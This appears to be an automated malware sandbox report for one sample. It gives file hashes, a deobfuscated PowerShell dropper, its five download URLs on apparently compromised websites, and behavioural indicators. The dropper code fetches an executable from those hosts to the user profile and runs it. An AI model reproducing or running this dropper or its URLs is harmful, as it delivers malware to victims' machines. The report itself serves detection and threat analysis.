General

  • Target

    f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

  • Size

    143KB

  • Sample

    220625-k1eykagch3

  • MD5

    8ec323edb643a73a6fa43fccacf6deca

  • SHA1

    9cb74cfb6cb5991866159c1ccf5e5606c24ea051

  • SHA256

    f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

  • SHA512

    57917137808d4ea22313b72470fbade7d10e4ed5c4588b01384eb5bd964417aee1913a9da745466aba3ae86d6afb8b0b75f9e2c79dede4eda74a930fbbcfc7cc

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
    # Junk string assignments interleaved throughout are obfuscation padding; they are never read.
    $b302523 = "K7145_0_"
    # Payload is written to %USERPROFILE%\106.exe
    $t0575862 = "106"
    $s372880 = "R137437"
    $t_533031 = $env:userprofile + "\\" + $t0575862 + ".exe"
    $p27526 = "Y_86957"
    $z919139 = new-object net.webclient
    # Five fallback download locations, tried in order (see the URLs section below)
    $p067442 = "http://splussystems.com/wp-admin/eUJLagjD/", "http://www.portduo.com/wp-content/KdWRhFjK/", "http://telenvivo.com/hq1g/vp33l1h56_o4b8mev9qw-7034/", "http://luxuryindiancatering.co.uk/wp-includes/ukoe_7v10mk-02/", "http://prizma.ch/wp-content/fFVmwFqTq/"
    $o88694 = "j246134"
    foreach ($p791759 in $p067442) {
        try {
            $z919139.downloadfile($p791759, $t_533031)
            $p61_2194 = "S0778_3_"
            # Accept the download only if it is at least 38915 bytes (rejects error pages / empty replies), then execute it and stop
            if ((get-item $t_533031).length -ge 38915) {
                invoke-item $t_533031
                $b95_6510 = "S9122723"
                break
                $j7506168 = "K55_487_"
            }
        } catch {
            # Failures are swallowed silently and the next URL is tried
        }
URLs

    exe.dropper    http://splussystems.com/wp-admin/eUJLagjD/
    exe.dropper    http://www.portduo.com/wp-content/KdWRhFjK/
    exe.dropper    http://telenvivo.com/hq1g/vp33l1h56_o4b8mev9qw-7034/
    exe.dropper    http://luxuryindiancatering.co.uk/wp-includes/ukoe_7v10mk-02/
    exe.dropper    http://prizma.ch/wp-content/fFVmwFqTq/

Targets

    • Target

      f412a78d93f03f39f6a58c865c75d6481a3ecfb83a3fdbf1ed32c0c546a773f5

    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

    • Blocklisted process makes network request

    • Drops file in System32 directory

MITRE ATT&CK Enterprise v6
